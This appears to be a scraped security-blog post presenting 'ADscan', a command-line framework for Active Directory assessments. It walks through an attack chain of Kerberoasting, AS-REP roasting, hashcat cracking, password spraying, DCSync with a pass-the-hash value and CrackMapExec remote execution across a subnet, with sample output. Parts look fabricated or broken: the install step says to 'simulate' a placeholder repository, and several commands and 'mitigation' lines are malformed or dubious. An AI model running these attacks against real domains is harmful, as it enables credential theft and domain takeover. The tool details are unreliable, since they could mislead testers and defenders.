Listen to this Post

Introduction
Active Directory (AD) remains the most targeted authentication service in enterprise environments, with over 90% of Fortune 500 companies relying on it—and attackers know every misconfigured Kerberoastable service account or unpatched DCSync privilege is a potential kingdom. ADscan emerges as a unified CLI framework that bridges the gap between SharpHound’s enumeration depth and CrackMapExec’s execution flexibility, automating full-cycle AD security assessments from unauthenticated reconnaissance to MITRE ATT&CK-mapped reporting, all while slashing manual pentesting workflows by hours.
Learning Objectives
- Perform comprehensive AD reconnaissance using DNS, LDAP, SMB, Kerberos, and ADCS without switching tools.
- Execute Kerberoasting, AS‑REP roasting, password spraying, GPP attacks, and DCSync from a single CLI interface.
- Generate penetration test reports automatically mapped to MITRE ATT&CK tactics (TA0006, T1558, etc.) in TXT/JSON.
You Should Know
- Installing ADscan and Setting Up Your Attack Lab
ADscan is designed for Kali Linux and compatible with any Debian-based distribution. It requires Python 3.9+, Impacket, and BloodHound dependencies for data export.
Step‑by‑step installation guide:
Clone the repository (replace with actual URL if public, else simulate) git clone https://github.com/example/ADscan.git Hypothetical URL from the tool author cd ADscan Install required Python packages pip3 install -r requirements.txt Install system dependencies for Kerberos and SMB sudo apt update && sudo apt install -y krb5-user smbclient ldap-utils Verify installation python3 adscan.py --help
Example output on successful install:
ADscan v1.0 - Active Directory Security Assessment Framework Usage: adscan.py [bash] COMMAND Commands: recon Perform AD enumeration (DNS, LDAP, SMB, Kerberos) attack Execute exploitation modules (kerberoast, asreproast, spray, dcsync) report Generate MITRE ATT&CK mapped report
For Windows penetration testers, ADscan can be run via WSL2 or a dedicated Linux VM—there is no native Windows binary, but you can execute the tool from a Kali Windows Subsystem for Linux (WSL) instance with network access to the domain controller.
2. Unauthenticated AD Reconnaissance – Scanning Without Credentials
Before obtaining any domain credentials, ADscan can extract critical information from exposed LDAP, DNS, and SMB services. This mimics an external attacker or a rogue insider on a guest network.
Command for unauthenticated enumeration:
python3 adscan.py recon --dc-ip 192.168.1.10 --domain corp.local --no-auth
What this does:
- Performs DNS zone transfer attempts against the domain controller.
- Enumerates LDAP rootDSE to retrieve domain naming contexts.
- Lists SMB shares anonymously (null session if legacy configurations exist).
- Identifies Kerberos policy details (ticket lifetime, supported encryption types).
- Exports data to `./bloodhound_export/` for later ingestion into BloodHound.
Example snippet of TXT output:
[+] DNS SRV records for _ldap._tcp.corp.local: 192.168.1.10, 192.168.1.11 [+] LDAP rootDSE: defaultNamingContext=DC=corp,DC=local [+] SMB anonymous share: IPC$ (accessible), NETLOGON (accessible) [+] Kerberos encryption types supported: AES256-CTS-HMAC-SHA1-96
Pro tip: Save the JSON output (--output json) to feed into automated analysis tools like BloodHound’s `bloodhound-python` for visual attack path mapping.
3. Authenticated Reconnaissance and Attack Chain Automation
Once you have valid domain credentials (e.g., from a phishing campaign or a compromised low-privilege account), ADscan switches to authenticated mode to discover privilege escalation paths.
Command for authenticated full enumeration:
python3 adscan.py recon --dc-ip 192.168.1.10 --domain corp.local --username john.doe --password 'P@ssw0rd' --export-bloodhound
Step‑by‑step actions:
- LDAP query – Retrieves all users, groups, computers, and organizational units.
- SMB session – Enumerates shares and checks for GPP (Group Policy Preferences) cpassword vulnerabilities.
- Kerberos ticket collection – Lists Service Principal Names (SPNs) for Kerberoasting.
- ADCS discovery – Detects Active Directory Certificate Services misconfigurations (ESC1–ESC8).
- BloodHound data generation – Outputs ZIP file ready for BloodHound visualization.
Windows alternative using native tools (for reference):
Equivalent manual enumeration in PowerShell (ADscan automates this)
Get-ADUser -Filter -Properties ServicePrincipalName | Where-Object {$_.ServicePrincipalName}
4. Executing Kerberoasting and AS‑REP Roasting Attacks
ADscan’s `attack` module streamlines two of the most effective offline password cracking techniques.
Kerberoasting – Crack service account hashes:
python3 adscan.py attack kerberoast --dc-ip 192.168.1.10 --domain corp.local --username john.doe --password 'P@ssw0rd' --output hashes.kerberoast
What it does: Requests a Ticket Granting Service (TGS) ticket for any SPN, extracts the encrypted hash (RC4_HMAC or AES), and saves it in Hashcat format ($krb5tgs$...).
AS‑REP Roasting – Target users with Kerberos pre‑authentication disabled:
python3 adscan.py attack asreproast --dc-ip 192.168.1.10 --domain corp.local --username list.txt --password '' --output hashes.asrep
Cracking the hashes (Linux):
hashcat -m 13100 hashes.kerberoast /usr/share/wordlists/rockyou.txt Kerberoast mode hashcat -m 18200 hashes.asrep /usr/share/wordlists/rockyou.txt AS-REP mode
If successful, you obtain plaintext service account passwords—often leading to domain admin.
- Password Spraying and DCSync – Lateral Movement & Golden Ticket
ADscan automates low-and-slow password spraying to avoid account lockouts, followed by DCSync to simulate a domain controller replication attack.
Password spray command:
python3 adscan.py attack spray --dc-ip 192.168.1.10 --domain corp.local --userlist users.txt --password 'Spring2025!' --delay 30 --lockout-threshold 5
DCSync attack (requires Domain Admin or Replicating Directory Changes privileges):
python3 adscan.py attack dcsync --dc-ip 192.168.1.10 --domain corp.local --username administrator --hash aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0 --output dcsync_hashes.ntds
How DCSync works: ADscan leverages the Mimikatz `lsadump::dcsync` logic via Impacket’s `secretsdump.py` under the hood, forcing the target domain controller to replicate password hashes of any user (including KRBTGT) without touching the NTDS.dit file on disk.
Mitigation command for defenders (Windows):
Identify users with Replicating Directory Changes rights
net group "Exchange Windows Permissions" /domain
Remove excessive privileges using ADSI Edit or:
dsacls "DC=corp,DC=local" /remove "{SID}" /domain
6. Automated Report Generation with MITRE ATT&CK Mapping
After completing the attack chain, ADscan produces a structured report that aligns each finding with MITRE ATT&CK tactics and techniques, reducing manual report writing time significantly.
Generate report:
python3 adscan.py report --input adscan_results.json --format json,html --mitre
Example report excerpt (JSON):
{
"technique": "T1558.003 - Kerberoasting",
"tactic": "Credential Access (TA0006)",
"affected_assets": ["[email protected]", "[email protected]"],
"remediation": "Use Managed Service Accounts (MSAs) or group Managed Service Accounts (gMSAs); set long complex passwords; limit SPN assignment"
}
For security teams, this automation enables continuous compliance checks (PCI-DSS, HIPAA) by integrating ADscan into CI/CD pipelines using the JSON output.
- Comparison with SharpHound and CrackMapExec – When to Use ADscan
While ADscan combines enumeration and exploitation, SharpHound excels at BloodHound data collection, and CrackMapExec offers broader protocol coverage (WinRM, SSH, MSSQL). ADscan is ideal for red teams who want a single tool for quick AD assessments without managing multiple scripts.
Example hybrid workflow:
Use ADscan for initial recon and attack python3 adscan.py recon --authenticated --dc-ip 10.0.0.1 --export-bloodhound Then import into BloodHound (running separately) bloodhound --zipfile ./bloodhound_export/2025-03-15_audit.zip For post‑exploitation lateral movement, use CrackMapExec with credentials found crackmapexec smb 10.0.0.0/24 -u administrator -H 'aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0' --exec-method smbexec
Linux hardening commands to detect ADscan-like activity:
Defenders can monitor for Get-NetUser, SPN, `LDAP query` patterns using Sysmon or auditd:
sudo auditctl -w /var/log/syslog -p wa -k ad_attack sudo journalctl -f | grep -i "kerberoast|asrep|dcsync"
What Undercode Say
- Unified automation reduces human error – ADscan’s ability to chain enumeration, attacks, and reporting in one CLI minimizes missed attack paths common when juggling separate tools like PowerView, Rubeus, and Impacket.
- MITRE mapping is a game‑changer for compliance – Automatic mapping to ATT&CK techniques (e.g., T1558.003, T1003.006) transforms raw pentest output into actionable risk assessments, saving hours of manual tabulation.
- But ecosystem maturity matters – The post rightly notes ADscan lags behind SharpHound’s BloodHound integration depth and CrackMapExec’s vast module library; red teams should treat it as a force‑multiplier, not a total replacement.
Prediction
As Microsoft continues to push Defender for Identity and Azure AD hardening, on‑premises Active Directory attacks will pivot further toward certificate misconfigurations (ADCS ESC attacks) and cloud‑hybrid Kerberos flaws. ADscan’s roadmap likely includes automated ADCS exploitation and Azure AD Connect dump modules—turning this framework into a de facto standard for purple team exercises within 12 months. Expect detection vendors to build ADscan‑specific SIGMA rules, forcing attackers to shift to more fragmented, custom tooling again. The arms race continues.
▶️ Related Video (74% Match):
🎯Let’s Practice For Free:
IT/Security Reporter URL:
Reported By: Syed Muneeb – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅


